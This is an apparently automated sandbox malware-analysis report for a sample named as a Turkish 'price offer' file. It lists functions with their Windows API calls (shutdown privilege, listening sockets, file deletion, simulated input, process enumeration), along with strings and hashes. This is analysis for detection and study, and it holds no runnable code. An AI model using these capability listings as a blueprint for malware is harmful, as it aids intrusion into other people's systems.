Instruction ID: 58ba85d120d0ab93a53e7052bacae95d19885df95610905466e01ea04b53c95c
Opcode Fuzzy Hash: 2b6bca281e77385d0d50c35265b66065e401f8e3a6389816bd7944d975d99326
Instruction Fuzzy Hash: BC419F35604611AFE310DF55E848F69BBE9FF44328F14C499E5658B6B2C735EC42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 009EE8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 009E16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009E170D
Part of subcall function 009E16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009E173A
Part of subcall function 009E16C3: GetLastError.KERNEL32 ref: 009E174A

ExitWindowsEx.USER32(?,00000000), ref: 009EE932

Strings

, xrefs: 009EE920
SeShutdownPrivilege, xrefs: 009EE902
, xrefs: 009EE95C
@, xrefs: 009EE925

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 64c6a279782d40f6b5dd93c58e14eb8f2793cff46f41ad7eac102bcfddc17468
Instruction ID: 28f6f8959552b6f84103c68e5311d8a1a15f609e4a7be9de33ae0270154ce445
Opcode Fuzzy Hash: 64c6a279782d40f6b5dd93c58e14eb8f2793cff46f41ad7eac102bcfddc17468
Instruction Fuzzy Hash: C7014972650251ABEB1662B69C86FFF72DCA708790F144821FC03E31D3E6B49C4481A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A01204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00A01276
WSAGetLastError.WSOCK32 ref: 00A01283
bind.WSOCK32(00000000,?,00000010), ref: 00A012BA
WSAGetLastError.WSOCK32 ref: 00A012C5
closesocket.WSOCK32(00000000), ref: 00A012F4
listen.WSOCK32(00000000,00000005), ref: 00A01303
WSAGetLastError.WSOCK32 ref: 00A0130D
closesocket.WSOCK32(00000000), ref: 00A0133C

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: 20822531e79c8fdfc4ecfd778e28a340cabecaa48b81d2d5b198792db2bea879
Instruction ID: b156730e1f2438357b20b814dc2b0175e18c103e8637b36d4aa1cf65ea985975
Opcode Fuzzy Hash: 20822531e79c8fdfc4ecfd778e28a340cabecaa48b81d2d5b198792db2bea879
Instruction Fuzzy Hash: 44416171A001049FD710DF64D484BA9BBE5AF8A328F188198E8569F2D2C771ED82CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 009BB952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 009BB9D4
_free.LIBCMT ref: 009BB9F8
_free.LIBCMT ref: 009BBB7F
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00A23700), ref: 009BBB91
WideCharToMultiByte.KERNEL32(00000000,00000000,00A5121C,000000FF,00000000,0000003F,00000000,?,?), ref: 009BBC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00A51270,000000FF,?,0000003F,00000000,?), ref: 009BBC36
_free.LIBCMT ref: 009BBD4B

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: b8be5748d9b9321c0a18cfc1cfd062bb4b3f8adac390ff2ee346ba204902a19d
Instruction ID: 080ea690ac76038425beeae61de5d61dcae7349f8d34967d0e2e56cd9eb21b87
Opcode Fuzzy Hash: b8be5748d9b9321c0a18cfc1cfd062bb4b3f8adac390ff2ee346ba204902a19d
Instruction Fuzzy Hash: DAC1E471904205AEDB20DF69CE51BEEBBECEF81330F1445AAE494972D1EBB09E42C750

Uniqueness

Uniqueness Score: -1.00%

Function 009ED3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00983AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00983A97,?,?,00982E7F,?,?,?,00000000), ref: 00983AC2

Part of subcall function 009EE199: GetFileAttributesW.KERNEL32(?,009ECF95), ref: 009EE19A

FindFirstFileW.KERNEL32(?,?), ref: 009ED420
DeleteFileW.KERNEL32(?,?,?,?), ref: 009ED470
FindNextFileW.KERNEL32(00000000,00000010), ref: 009ED481
FindClose.KERNEL32(00000000), ref: 009ED498
FindClose.KERNEL32(00000000), ref: 009ED4A1

Strings

\*.*, xrefs: 009ED3F2

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 4836b4977d9979cb26766df3d333865138da2806662b18542be7dee94f491915
Instruction ID: 3eb4008e75c4162c7ed8d7f56e46e75b0f395c44249bfb2a9df6af9a4a3e6d7d
Opcode Fuzzy Hash: 4836b4977d9979cb26766df3d333865138da2806662b18542be7dee94f491915
Instruction Fuzzy Hash: 95314F710093859FC305FF64D8919AFB7A8AEE5314F448A1EF4D1522E1FB35AE098763

Uniqueness

Uniqueness Score: -1.00%

Function 009BE4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 009BE645

Strings

1#IND, xrefs: 009BF83D
1#QNAN, xrefs: 009BF84B
1#INF, xrefs: 009BF852
1#SNAN, xrefs: 009BF844

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 3178a6b6dca99dabbb24f07e23ff44aa9f0e88817b4f06eb187c6ff645702daa
Instruction ID: e40e6341e13223f4ecc4e4afc9c95d0fede2666e839a7a762a3cc9fc49d406df
Opcode Fuzzy Hash: 3178a6b6dca99dabbb24f07e23ff44aa9f0e88817b4f06eb187c6ff645702daa
Instruction Fuzzy Hash: 43C25C71E046288FDB25CF28DE507EAB7B9EB85314F1445EAD44DE7241E778AE818F40

Uniqueness

Uniqueness Score: -1.00%

Function 009F648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 009F64DC
CoInitialize.OLE32(00000000), ref: 009F6639
CoCreateInstance.OLE32(00A1FCF8,00000000,00000001,00A1FB68,?), ref: 009F6650
CoUninitialize.OLE32 ref: 009F68D4

Strings

.lnk, xrefs: 009F64BA, 009F6524, 009F65E0

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: a812dd594d154f608c609563f67f806fbf3daf4117d72ecbab943f8f583d1f92
Instruction ID: f24aa4de5dee947509c7ed0c7613113d94649349e730deb5700ff0884b797ea4
Opcode Fuzzy Hash: a812dd594d154f608c609563f67f806fbf3daf4117d72ecbab943f8f583d1f92
Instruction Fuzzy Hash: 37D14771508305AFD304EF24C881A6BB7E8FFD8704F14496DF5959B2A1EB71E909CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00A022DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 00A022E8

Part of subcall function 009FE4EC: GetWindowRect.USER32(?,?), ref: 009FE504

GetDesktopWindow.USER32 ref: 00A02312
GetWindowRect.USER32(00000000), ref: 00A02319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00A02355
GetCursorPos.USER32(?), ref: 00A02381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00A023DF

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: f4589c0cfb366630386baa2a4d65320a4ede1faf619d9f4520c070797f357885
Instruction ID: 9c1d843e177fc0f13dca1bc2474789fc8d2b6c7d197f10242caca0825a558a11
Opcode Fuzzy Hash: f4589c0cfb366630386baa2a4d65320a4ede1faf619d9f4520c070797f357885
Instruction Fuzzy Hash: 77310072144309AFC720DF54D848B9BBBEAFF84720F004919F9949B191DB34EA09CB92

Uniqueness

Uniqueness Score: -1.00%

Function 009F9B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 009F9B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 009F9C8B

Part of subcall function 009F3874: GetInputState.USER32 ref: 009F38CB
Part of subcall function 009F3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009F3966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 009F9BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 009F9C75

Strings

*.*, xrefs: 009F9B5D

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: a6042b7cbe9942dc3f9e55f5d950c88f3576a3168aa88ba9b4ab4cb560a3f5a2
Instruction ID: 005b2b8fe4840af436a0d953e47155a1843974b9bb012cd9fb7434fbf9ebd1c3
Opcode Fuzzy Hash: a6042b7cbe9942dc3f9e55f5d950c88f3576a3168aa88ba9b4ab4cb560a3f5a2
Instruction Fuzzy Hash: B441617194420EAFCF14EFA4C845BFE7BB8EF45311F148156E959A2291EB309E85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0099997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 00999BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00999BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 00999A4E
GetSysColor.USER32(0000000F), ref: 00999B23
SetBkColor.GDI32(?,00000000), ref: 00999B36

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: d55eb680deb26687ec5b3d5adcf665e260830df5820aa152782ebf17c942ff7b
Instruction ID: 687d6db51d23725e2337327d944a05e8ca5b0b7e2b9134cf6a1617bc50e7345f
Opcode Fuzzy Hash: d55eb680deb26687ec5b3d5adcf665e260830df5820aa152782ebf17c942ff7b
Instruction Fuzzy Hash: DBA12970149504BFEF28DABC8C98FBF669DEB86350F14860EF402D6691DA29DD41D272

Uniqueness

Uniqueness Score: -1.00%

Function 00A01806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00A0304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A0307A
Part of subcall function 00A0304E: _wcslen.LIBCMT ref: 00A0309B

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00A0185D
WSAGetLastError.WSOCK32 ref: 00A01884
bind.WSOCK32(00000000,?,00000010), ref: 00A018DB
WSAGetLastError.WSOCK32 ref: 00A018E6
closesocket.WSOCK32(00000000), ref: 00A01915

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: fedf23f35654e826a764ce0c4d461d757e8122dbe0a09ceed7e13790dd09f20d
Instruction ID: 20eb5b58ad12015abd7c8d47d7c5050cb729c8f478fc71b683dbf1154d0f4c1f
Opcode Fuzzy Hash: fedf23f35654e826a764ce0c4d461d757e8122dbe0a09ceed7e13790dd09f20d
Instruction Fuzzy Hash: 9951A271A00200AFEB10EF64D886F6A77E5AB84718F18C498FA159F3D3D771AD41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A11C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00A11CC0
IsWindowEnabled.USER32 ref: 00A11CCE
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00A11CDB
IsIconic.USER32 ref: 00A11CE9
IsZoomed.USER32 ref: 00A11CF7

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: d8f3e3bfb08eaad5f4364efcd678084393a3cdb9c1bd1a900befa3c77c839730
Instruction ID: 4a080e7a5703d0020b35df091b147e6cf9d992db20207ec34b22771a6644831f
Opcode Fuzzy Hash: d8f3e3bfb08eaad5f4364efcd678084393a3cdb9c1bd1a900befa3c77c839730
Instruction Fuzzy Hash: 3521B5317802115FD7209F2AD884FAA7BE5EF85364F198058E946CB351DB71DC82CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 00988060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON

Download Yara Rule

Strings

VUUU, xrefs: 009C5DF0
VUUU, xrefs: 009883FA
ERCP, xrefs: 0098813C
VUUU, xrefs: 0098843C
VUUU, xrefs: 009883E8

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 9fcb68debc02c3750969d49dbe6bcf00725382215995be933319fb75302f1ddf
Instruction ID: ec271effbd8fc9756521eae906730df968b335cecc51bebfa5fd66338cfe5909
Opcode Fuzzy Hash: 9fcb68debc02c3750969d49dbe6bcf00725382215995be933319fb75302f1ddf
Instruction Fuzzy Hash: 38A2A371E0021ACBDF24DF58C840BAEB7B5BF54310F6585AAE815A7385EB34AD81CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00A0A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00A0A6AC
Process32FirstW.KERNEL32(00000000,?), ref: 00A0A6BA

Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD

Process32NextW.KERNEL32(00000000,?), ref: 00A0A79C
CloseHandle.KERNEL32(00000000), ref: 00A0A7AB

Part of subcall function 0099CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,009C3303,?), ref: 0099CE8A

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: c31c03b0493825892a4b7fc8386c7d43c1ec01fb74d734b24e21e6855e917b5d
Instruction ID: 105ae1c124fc02bee40b24b0f5f8bf66a4e22f425ccb2a0813d55f251f2ebc78
Opcode Fuzzy Hash: c31c03b0493825892a4b7fc8386c7d43c1ec01fb74d734b24e21e6855e917b5d
Instruction Fuzzy Hash: BF515BB1508301AFD710EF64D886A6BBBE8FFC9754F00892DF595972A1EB31D904CB92

Uniqueness

Uniqueness Score: -1.00%

Function 009EAA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 009EAAAC
SetKeyboardState.USER32(00000080), ref: 009EAAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 009EAB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 009EAB88

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 794ae3eb13ca35d738b85be6815f7fd1373785b6f314463831e38b654d42a972
Instruction ID: 3159848e0f3555381d2002f5acb8c58092440e24524d749a3e9ed482b1cd2725
Opcode Fuzzy Hash: 794ae3eb13ca35d738b85be6815f7fd1373785b6f314463831e38b654d42a972
Instruction Fuzzy Hash: 98311C30A40288AEFB36CA66CC05BFA77ABAB54320F0C421AF191961F1D374AD85C752

Uniqueness

Uniqueness Score: -1.00%

Function 009FCE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 009FCE89
GetLastError.KERNEL32(?,00000000), ref: 009FCEEA
SetEvent.KERNEL32(?,?,00000000), ref: 009FCEFE

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: 601c4c3c2bfcdbdb3061d03d082405bf719f5dc9dfe2b416510046ca9e53b1b9
Instruction ID: 3526e9861fbefeeba35125a51ab3b53032b7cd5c91dbf1e41cc6a6f9dda814b9
Opcode Fuzzy Hash: 601c4c3c2bfcdbdb3061d03d082405bf719f5dc9dfe2b416510046ca9e53b1b9
Instruction Fuzzy Hash: B921BDB154030DABDB20DFA5CA48BB6B7FCEF40354F10882EE646D2151E774EE058BA4

Uniqueness

Uniqueness Score: -1.00%

Function 009E8298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 009E82AA

Strings

(, xrefs: 009E82F0
|, xrefs: 009E82DA

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 46b65c6f33ac9ff8b38cef34559333957757beef95a45ad2867b5ee33eb70f6b
Instruction ID: 9dbde40b4db1058d3f2fee50dfefa6ddf2869e2151b741b453d413b054d225ae
Opcode Fuzzy Hash: 46b65c6f33ac9ff8b38cef34559333957757beef95a45ad2867b5ee33eb70f6b
Instruction Fuzzy Hash: 9B323575A007459FCB29CF5AC481A6AB7F0FF48710B15C56EE49ADB3A1EB70E941CB40

Uniqueness

Uniqueness Score: -1.00%

Function 009F5C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 009F5CC1
